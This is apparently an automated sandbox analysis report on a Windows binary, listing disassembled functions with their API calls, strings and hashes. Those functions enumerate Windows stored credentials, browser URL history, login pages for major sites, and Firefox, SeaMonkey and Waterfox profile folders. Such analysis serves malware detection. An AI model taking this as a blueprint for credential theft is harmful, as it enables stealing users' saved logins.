                                • FindCloseUrlCache.WININET(?), ref: 0040C3B0
                                Strings
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: CacheFind$Entrymemset$Nextwcschr$??2@CloseErrorFirstFolderLastPathSpecial
                                • String ID: visited:
                                • API String ID: 2470578098-1702587658
                                • Opcode ID: 93c9a51482be428e2f8f42027b6bca19130ab09787b58ace62cc7f2a9cf54466
                                • Instruction ID: 6629d855392f08d41decd2a192e4b6579142cf3eaa95f33c860a05aa0b18639b
                                • Opcode Fuzzy Hash: 93c9a51482be428e2f8f42027b6bca19130ab09787b58ace62cc7f2a9cf54466
                                • Instruction Fuzzy Hash: DA417F71D00219ABDB10EF92DC85AEFBBB8FF45714F10416AE904F7281D7389A45CBA9
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0040BB98, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 145COMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 0040CC26: GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                  • Part of subcall function 0040CC26: FindCloseChangeNotification.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                  • Part of subcall function 0040CCF0: _wcsicmp.MSVCRT ref: 0040CD2A
                                • memset.MSVCRT ref: 0040BC75
                                • memset.MSVCRT ref: 0040BC8C
                                • WideCharToMultiByte.KERNEL32(00000000,00000000,Function_0004E518,000000FF,?,00000FFF,00000000,00000000,?,?,?,0040B7D4,?,?), ref: 0040BCA8
                                • memcmp.MSVCRT ref: 0040BCD6
                                • memcpy.MSVCRT ref: 0040BD2B
                                • LocalFree.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,?,0040B7D4), ref: 0040BD3D
                                Strings
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: memset$ByteChangeCharCloseFileFindFreeLocalMultiNotificationSizeWide_wcsicmpmemcmpmemcpy
                                • String ID:
                                • API String ID: 509814883-3916222277
                                • Opcode ID: 4ebf604db45489440b0c8485e844b7deffc41ff7e568ae10611abfa3d316197e
                                • Instruction ID: 00a8249a540342db609c93f8c1f67c79963b4134db5221072d0e6ece1bb2d715
                                • Opcode Fuzzy Hash: 4ebf604db45489440b0c8485e844b7deffc41ff7e568ae10611abfa3d316197e
                                • Instruction Fuzzy Hash: 3F41B372900219ABDB10ABA5CC85ADEB7ACEF04314F01057BB509F7292D7789E45CA99
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0041837F, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 140fileCOMMON
                                Download Yara Rule
                                APIs
                                • CreateFileW.KERNELBASE(?,-7FBE829D,00000003,00000000,?,?,00000000), ref: 00418457
                                • CreateFileA.KERNEL32(?,-7FBE829D,00000003,00000000,|A,00417CE3,00000000), ref: 0041846F
                                • GetLastError.KERNEL32 ref: 0041847E
                                • ??3@YAXPAX@Z.MSVCRT ref: 0041848B
                                Strings
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: CreateFile$??3@ErrorLast
                                • String ID: |A
                                • API String ID: 1407640353-1717621600
                                • Opcode ID: 909bfc9beb56609f0d98a45d83f95941f363312e1f875ee3b5f687390af7eeb7
                                • Instruction ID: 73005d91fce95ddd83c4435d1527c7398ec28b7193468e33704956b81d718a95
                                • Opcode Fuzzy Hash: 909bfc9beb56609f0d98a45d83f95941f363312e1f875ee3b5f687390af7eeb7
                                • Instruction Fuzzy Hash: 50412472508306AFD710CF25DC4179BBBE5FF84328F14492EF8A492290EB78D9448B96
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00412465, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 88windowCOMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: ??2@$HandleIconLoadModulememsetwcscpy
                                • String ID: r!A
                                • API String ID: 2791114272-628097481
                                • Opcode ID: c924fcd7ecfcbdf661535418ab9e4f477d4ea067639620652b406838daccced0
                                • Instruction ID: f2e108ad35b37ee9f58e8ef6409d1766b43f0b07df47584fb449e80907097569
                                • Opcode Fuzzy Hash: c924fcd7ecfcbdf661535418ab9e4f477d4ea067639620652b406838daccced0
                                • Instruction Fuzzy Hash: 0431A1B19013889FEB30EF669C896CAB7E8FF44314F00852FE90CCB241DBB946548B49
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0040C768, Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 87COMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 0040B1AB: ??3@YAXPAX@Z.MSVCRT ref: 0040B1AE
                                  • Part of subcall function 0040B1AB: ??3@YAXPAX@Z.MSVCRT ref: 0040B1B6
                                  • Part of subcall function 0040AA04: ??3@YAXPAX@Z.MSVCRT ref: 0040AA0B
                                  • Part of subcall function 0040C274: memset.MSVCRT ref: 0040C298
                                  • Part of subcall function 0040C274: FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                                  • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C324
                                  • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C344
                                  • Part of subcall function 0040C274: FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                                  • Part of subcall function 0040C274: GetLastError.KERNEL32 ref: 0040C373
                                  • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C439
                                  • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                                  • Part of subcall function 0040C3C3: _wcsupr.MSVCRT ref: 0040C481
                                  • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C4D0
                                  • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                                • _wcslwr.MSVCRT ref: 0040C817
                                  • Part of subcall function 0040C634: wcslen.MSVCRT ref: 0040C65F
                                  • Part of subcall function 0040C634: memset.MSVCRT ref: 0040C6BF
                                • wcslen.MSVCRT ref: 0040C82C
                                Strings
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: memset$??3@$CacheEntryEnumFindValuewcschrwcslen$ErrorFirstLastNext_wcslwr_wcsupr
                                • String ID: /$/$http://www.facebook.com/$https://login.yahoo.com/config/login$https://www.google.com/accounts/servicelogin
                                • API String ID: 62308376-4196376884
                                • Opcode ID: b881829d82f0d8b9654aa99a04529af2f3c2152f6b010e5444e3d03ead400705
                                • Instruction ID: 5b72bd72183a146cc5fb8da473a5bce975bbff0c760a192580a28ed18ba85502
                                • Opcode Fuzzy Hash: b881829d82f0d8b9654aa99a04529af2f3c2152f6b010e5444e3d03ead400705
                                • Instruction Fuzzy Hash: 42218272A00244A6CF10BB6A9C8589E7B68EF44744B10457BB804B7293D67CDE85DB9D
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0040A804, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 40libraryCOMMON
                                Download Yara Rule
                                APIs
                                • memset.MSVCRT ref: 0040A824
                                • GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                • wcscpy.MSVCRT ref: 0040A854
                                • wcscat.MSVCRT ref: 0040A86A
                                • LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                • LoadLibraryW.KERNEL32(?), ref: 0040A884
                                Strings
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                • String ID: C:\Windows\system32
                                • API String ID: 669240632-2896066436
                                • Opcode ID: 808217d469f29374b6c53add07773bde8ba425e7a3f83fd710eb9a2b8acfca27
                                • Instruction ID: 21688b76284891f368be2c5f4feed5723597baa153f24eadc702144372ba9d0b
                                • Opcode Fuzzy Hash: 808217d469f29374b6c53add07773bde8ba425e7a3f83fd710eb9a2b8acfca27
                                • Instruction Fuzzy Hash: A6F0A472D0022467DF207B65AC46B8A3B6CBF01754F008072F908B71D2EB789A55CFDA
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0040BDB0, Relevance: 12.2, APIs: 8, Instructions: 151COMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 00404398
                                  • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043AC
                                  • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043BF
                                  • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043D3
                                  • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043E7
                                • CredEnumerateW.SECHOST(00000000,00000000,?,?,?,00000000,?), ref: 0040BDE9
                                • wcslen.MSVCRT ref: 0040BE06
                                • _wcsncoll.MSVCRT ref: 0040BE38
                                • memset.MSVCRT ref: 0040BE91
                                • memcpy.MSVCRT ref: 0040BEB2
                                • _wcsnicmp.MSVCRT ref: 0040BEFC
                                • wcschr.MSVCRT ref: 0040BF24
                                • LocalFree.KERNEL32(?,?,?,?,00000001,?,?,?,00000000,?), ref: 0040BF48
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: AddressProc$CredEnumerateFreeLocal_wcsncoll_wcsnicmpmemcpymemsetwcschrwcslen
                                • String ID:
                                • API String ID: 3191383707-0
                                • Opcode ID: 33cbc3fbfef4114ffc04ab79ab4e472c1ca1484598d0cfc67a802b423a316e07
                                • Instruction ID: 79a9ca8399314c5bcb3e205da5602351372edcdcc58f79068602210d8f55f42f
                                • Opcode Fuzzy Hash: 33cbc3fbfef4114ffc04ab79ab4e472c1ca1484598d0cfc67a802b423a316e07
                                • Instruction Fuzzy Hash: 1851E9B5D002099FCF20DFA5C8859AEBBF9FF48304F10452AE919F7251E734A9458F69
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00403C9C, Relevance: 12.1, APIs: 6, Strings: 2, Instructions: 121COMMON
                                Download Yara Rule
                                APIs
                                • memset.MSVCRT ref: 00403CBF
                                • memset.MSVCRT ref: 00403CD4
                                • memset.MSVCRT ref: 00403CE9
                                • memset.MSVCRT ref: 00403CFE
                                • memset.MSVCRT ref: 00403D13
                                  • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                  • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                  • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                  • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                  • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                • memset.MSVCRT ref: 00403DDA
                                  • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                  • Part of subcall function 004099C6: memcpy.MSVCRT ref: 004099E3
                                Strings
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: memset$wcscpy$wcslen$CloseFolderPathSpecial_snwprintfmemcpywcscat
                                • String ID: Waterfox$Waterfox\Profiles
                                • API String ID: 4039892925-11920434
                                • Opcode ID: 74213e66932f07ea3ad059af1798c87c438cc92db4e0e7cdb609a7dadd567ada
                                • Instruction ID: d72014143a293005b417e5222852f61d3cfc405123c5957a7e6d01a12b636873
                                • Opcode Fuzzy Hash: 74213e66932f07ea3ad059af1798c87c438cc92db4e0e7cdb609a7dadd567ada
                                • Instruction Fuzzy Hash: 1E4133B294012C7ADB20EB56DC85ECF777CEF85314F1180ABB509B2181DA745B948FAA
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00403E2D, Relevance: 12.1, APIs: 6, Strings: 2, Instructions: 121COMMON
                                Download Yara Rule
                                APIs
                                • memset.MSVCRT ref: 00403E50
                                • memset.MSVCRT ref: 00403E65
                                • memset.MSVCRT ref: 00403E7A
                                • memset.MSVCRT ref: 00403E8F
                                • memset.MSVCRT ref: 00403EA4
                                  • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                  • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                  • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                  • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                  • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                • memset.MSVCRT ref: 00403F6B
                                  • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                  • Part of subcall function 004099C6: memcpy.MSVCRT ref: 004099E3
                                Strings
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: memset$wcscpy$wcslen$CloseFolderPathSpecial_snwprintfmemcpywcscat
                                • String ID: Mozilla\SeaMonkey$Mozilla\SeaMonkey\Profiles
                                • API String ID: 4039892925-2068335096
                                • Opcode ID: fb8d06a7ed3fa35f71d99b938417e45633d605fe1ac21657eef3450a4ac41d2d
                                • Instruction ID: badb9319ce56d3a3e0b5d4601891faab39f88fc9b3936f94b46873e2979bc7df
                                • Opcode Fuzzy Hash: fb8d06a7ed3fa35f71d99b938417e45633d605fe1ac21657eef3450a4ac41d2d
                                • Instruction Fuzzy Hash: F94133B294012CBADB20EB56DC85FCF777CAF85314F1180A7B509F2181DA785B848F6A
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00403FBE, Relevance: 12.1, APIs: 6, Strings: 2, Instructions: 121COMMON
                                Download Yara Rule
                                APIs
                                • memset.MSVCRT ref: 00403FE1
                                • memset.MSVCRT ref: 00403FF6
                                • memset.MSVCRT ref: 0040400B
                                • memset.MSVCRT ref: 00404020
                                • memset.MSVCRT ref: 00404035
                                  • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                  • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                  • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                  • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                  • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                • memset.MSVCRT ref: 004040FC
                                  • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                  • Part of subcall function 004099C6: memcpy.MSVCRT ref: 004099E3
                                Strings
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: memset$wcscpy$wcslen$CloseFolderPathSpecial_snwprintfmemcpywcscat
                                • String ID: Mozilla\Firefox$Mozilla\Firefox\Profiles
                                • API String ID: 4039892925-3369679110
                                • Opcode ID: a800c2c864e82bb525ebc7d4b700ce70e1897f56eef446e490fc18a40a012dd3
                                • Instruction ID: a33c26704871042caa7cb74448a1974e70df039046fe21947f04a6d8cbe9f93a
                                • Opcode Fuzzy Hash: a800c2c864e82bb525ebc7d4b700ce70e1897f56eef446e490fc18a40a012dd3
                                • Instruction Fuzzy Hash: 354134B294012CBADB20EB56DC85ECF777CAF85314F1180A7B509B3181EA745B948F6A
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00444432, Relevance: 10.7, APIs: 1, Strings: 6, Instructions: 217COMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: memcpy
                                • String ID: BINARY$NOCASE$RTRIM$main$no such vfs: %s$temp
                                • API String ID: 3510742995-2641926074
                                • Opcode ID: 821e0fdd347fba4e0959882d1eed221cd0f9849de050a87fd0c537b7ccc40074
                                • Instruction ID: 565814064bb2237b40e40c3ad6633df45ffc5137317807aec9a32ad89077b3bf
                                • Opcode Fuzzy Hash: 821e0fdd347fba4e0959882d1eed221cd0f9849de050a87fd0c537b7ccc40074
                                • Instruction Fuzzy Hash: BA7119B1600701BFE710AF16CC81B66B7A8BB85319F11452FF4189B742D7BDED908B99
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 004032B4, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 119COMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 0040B633: ??3@YAXPAX@Z.MSVCRT ref: 0040B63A
                                  • Part of subcall function 0044553B: memset.MSVCRT ref: 004455C2
                                  • Part of subcall function 0044553B: wcsrchr.MSVCRT ref: 004455DA
                                • memset.MSVCRT ref: 004033B7
                                • memcpy.MSVCRT ref: 004033D0
                                • wcscmp.MSVCRT ref: 004033FC
                                • _wcsicmp.MSVCRT ref: 00403439
                                Strings
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: memset$??3@_wcsicmpmemcpywcscmpwcsrchr
                                • String ID: $0.@
                                • API String ID: 3030842498-1896041820
                                • Opcode ID: 90c1bd1f00aab923b8f25d437f952d518439630af4329cefc1ee53129d619d56
                                • Instruction ID: ab192eb15c9642abc1a13bae453f9d52c7669558764b377fc560e22e349fc473
                                • Opcode Fuzzy Hash: 90c1bd1f00aab923b8f25d437f952d518439630af4329cefc1ee53129d619d56
                                • Instruction Fuzzy Hash: 6B414A71A0C3819BD770EF65C885A8BB7E8AF86314F004D2FE48C97681DB3899458B5B
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 004449B9, Relevance: 10.6, APIs: 7, Instructions: 61libraryloaderCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                  • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                  • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                  • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                  • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                  • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                • GetProcAddress.KERNEL32(00000000,00000000), ref: 004449E7
                                • GetProcAddress.KERNEL32(00000000,00000000), ref: 004449F8
                                • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A09
                                • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A1A
                                • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A2B
                                • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A3C
                                • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A4D
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: AddressProc$LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                • String ID:
                                • API String ID: 2941347001-0
                                • Opcode ID: 80e482451f5ca37e8404f50e4d067f365766b265f7642500ec0655012d68ebd6
                                • Instruction ID: 45112ec7679d7541be2eaee67b01953ccf91f0241e5cd71b41190719d78dca83
                                • Opcode Fuzzy Hash: 80e482451f5ca37e8404f50e4d067f365766b265f7642500ec0655012d68ebd6
                                • Instruction Fuzzy Hash: 2E115871840700EDEA207F72DD0FF2B7AA5EF40B14F10882EF555594E1EBB6A8119E9C
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00403BED, Relevance: 9.1, APIs: 4, Strings: 2, Instructions: 57COMMON
                                Download Yara Rule
                                APIs
                                • memset.MSVCRT ref: 00403C09
                                • memset.MSVCRT ref: 00403C1E
                                  • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                  • Part of subcall function 00409719: wcslen.MSVCRT ref: 0040971A
                                  • Part of subcall function 00409719: wcscat.MSVCRT ref: 00409732
                                • wcscat.MSVCRT ref: 00403C47
                                  • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                  • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                  • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                • wcscat.MSVCRT ref: 00403C70
                                Strings
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: memsetwcscat$CloseFolderPathSpecialwcscpywcslen
                                • String ID: Mozilla\Firefox\Profiles$Mozilla\Profiles
                                • API String ID: 1534475566-1174173950
                                • Opcode ID: 8452d1ff202b3ecdc32f03c4689b339ff6508c8f38893fabe83067ed25a4ac21
                                • Instruction ID: 5219a381a5be6f9fff484f4b9c8ff18b49dc44b18064e24db21ac924a7a96902
                                • Opcode Fuzzy Hash: 8452d1ff202b3ecdc32f03c4689b339ff6508c8f38893fabe83067ed25a4ac21
                                • Instruction Fuzzy Hash: 4401A9B294032C76DB207B669C86ECF672C9F45358F01447FB504B7182D9785E844AA9
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00414C2E, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 77registryCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00414B81: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 00414BA4
                                • SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                • memset.MSVCRT ref: 00414C87
                                • RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                • wcscpy.MSVCRT ref: 00414CFC
                                  • Part of subcall function 00409CEA: GetVersionExW.KERNEL32(0045D340,0000001A,00414C4F,?,00000000), ref: 00409D04
                                Strings
                                • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00414CA2, 00414CB2
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: AddressCloseFolderPathProcSpecialVersionmemsetwcscpy
                                • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                • API String ID: 71295984-2036018995
                                • Opcode ID: f400cfab40eb781a7377af97b809c3f02e1ff83a00fe342fd0a4f0569afe9d8a
                                • Instruction ID: cfba8ba70a3d5c5eb0df7add68d4968905301debfffe1ddd107e81ced3c7690c
                                • Opcode Fuzzy Hash: f400cfab40eb781a7377af97b809c3f02e1ff83a00fe342fd0a4f0569afe9d8a
